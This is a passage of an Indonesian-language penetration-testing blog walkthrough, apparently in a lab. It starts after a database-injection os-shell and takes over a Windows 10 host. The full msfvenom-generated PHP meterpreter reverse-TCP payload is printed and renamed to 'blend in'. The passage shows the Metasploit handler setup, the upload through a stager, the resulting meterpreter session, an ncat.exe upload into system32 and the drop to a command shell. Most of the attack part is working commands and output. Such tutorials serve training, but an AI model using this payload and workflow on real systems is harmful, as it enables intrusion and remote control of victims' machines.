                                 DHCP Server:     255.255.255.255
                                 IP address(es)
                                 [01]: 169.254.149.255
                                 [02]: fe80::18f0:70a4:4f2c:95ff
                           [02]: Intel(R) PRO/1000 MT Desktop Adapter
                                 Connection Name: Ethernet 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.0.100
                                 IP address(es)
                                 [01]: 10.0.0.108
                                 [02]: fe80::a858:9eed:630a:53f7
Hyper-V Requirements:      A hypervisor has been detected. Features required for Hyper-V will not be displayed.

Dengan informasi di atas, kita dapat mempertimbangkan perangkat tambahan di jaringan yang akan dipivot.

Ada hal keren lainnya yang bisa kita lakukan dengan “wmic” di “os-shell” ini. Namun, mari kita beralih kembali ke mesin penyerang kita dan menggunakan alat favorit penguji penetrasi untuk membuat segalanya lebih menarik.

Mari kita mulai dengan “msfvenom”. Dalam contoh saya, saya mengarahkan output ke panggilan file bernama “tmp.php”

[email protected]:~$ msfvenom --payload php/meterpreter/reverse_tcp LHOST=10.0.0.107 LPORT=4443 --format raw --smallest > tmp.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1111 bytes

Jika saya “cat” file “tmp.php”, kita melihat:

[email protected]:~$ cat tmp.php 
/*<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f="stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type="stream"; } if (!$s && ($f="fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type="stream"; } if (!$s && ($f="socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type="socket"; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Kita sekarang harus menghapus “/*” dari awal file. Anda cukup membuka file di editor favorit Anda untuk menghapus dua karakter tersebut. Bagi saya, saya akan menggunakan “cut –characters” untuk memotong 2 karakter pertama dan menyimpan yang lainnya. Saya kemudian mengarahkan output itu ke file bernama “server.php”. Dengan nama itu saya berharap bisa berbaur.

[email protected]:~$ cat tmp.php | cut --characters 3- > server.php
[email protected]:~$ cat server.php 
<?php /**/ error_reporting(0); $ip = '10.0.0.107'; $port = 4443; if (($f="stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type="stream"; } if (!$s && ($f="fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type="stream"; } if (!$s && ($f="socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type="socket"; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

Selanjutnya kita memuat “msfconsole” dan mengkonfigurasi “multi/handler”

msf5 > use multi/handler

msf5 exploit(multi/handler) > set LHOST 10.0.0.107
LHOST => 10.0.0.107
msf5 exploit(multi/handler) > set LPORT 4443
LPORT => 443
msf5 exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp

Pastikan semuanya baik-baik saja.

msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.107       yes       The listen address (an interface may be specified)
   LPORT  4443              yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Mulai proses mendengarkan dengan menjalankan “exploit”

msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.0.0.107:4443 

Verifikasi port mendengarkan di sistem lokal kami.

[email protected]:~$ sudo ss --numeric --listening --tcp --process
sudo: unable to resolve host securtynik: Temporary failure in name resolution
State         Recv-Q        Send-Q               Local Address:Port                 Peer Address:Port        Process        
LISTEN        0             256                     10.0.0.107:4443                      0.0.0.0:*            users:(("ruby",pid=3354,fd=9))

Sepertinya kita baik untuk pergi.

Sekarang sepertinya kita memiliki pengaturan lingkungan penyerang, sekarang mari kita tinjau kembali stager kita yang telah diunggah sebelumnya ketika kita mendapatkan “os-shell”. Stager di-host di “http://10.0.0.108:80/tmpuevkq.php” seperti yang kita lihat sebelumnya.

Jika sekarang kami membuka browser kami dan menempelkan URL itu, kami melihat:

Saya kemudian mengklik browse dan memilih skrip “server.php” saya.

Sekarang mari kita jalankan skrip kita.

Pada titik ini, jika kita sekarang beralih ke “msfconsole” kita, kita melihat

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.0.0.107:4443 
[*] Sending stage (38288 bytes) to 10.0.0.108
[*] Meterpreter session 1 opened (10.0.0.107:4443 -> 10.0.0.108:6375) at 2020-06-24 17:03:23 -0400

meterpreter > 

Sepertinya kami berhasil mendapatkan sesi. Jalankan “sysinfo”

meterpreter > sysinfo 
Computer    : SECURITYNIK-WIN
OS          : Windows NT SECURITYNIK-WIN 10.0 build 16299 (Windows 10) i586
Meterpreter : php/windows

Pada titik ini, kami sekarang dapat mengunggah alat tambahan. Di sini saya mengunggah ncat.exe

meterpreter > upload ncat.exe c:\windows\system32\
[*] uploading  : ncat.exe -> c:windowssystem32
[*] uploaded   : ncat.exe -> c:windowssystem32\ncat.exe

Sebelum kita pergi, mari kita ambil cangkangnya.

meterpreter > shell
Process 3864 created.
Channel 6 created.
Microsoft Windows [Version 10.0.16299.125]
(c) 2017 Microsoft Corporation. All rights reserved.

C:WindowsSystem32>

Saya serahkan pada imajinasi Anda, apa yang Anda lakukan mulai sekarang. Saya akan menutup posting ini dan sampai jumpa di posting analisis log.

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *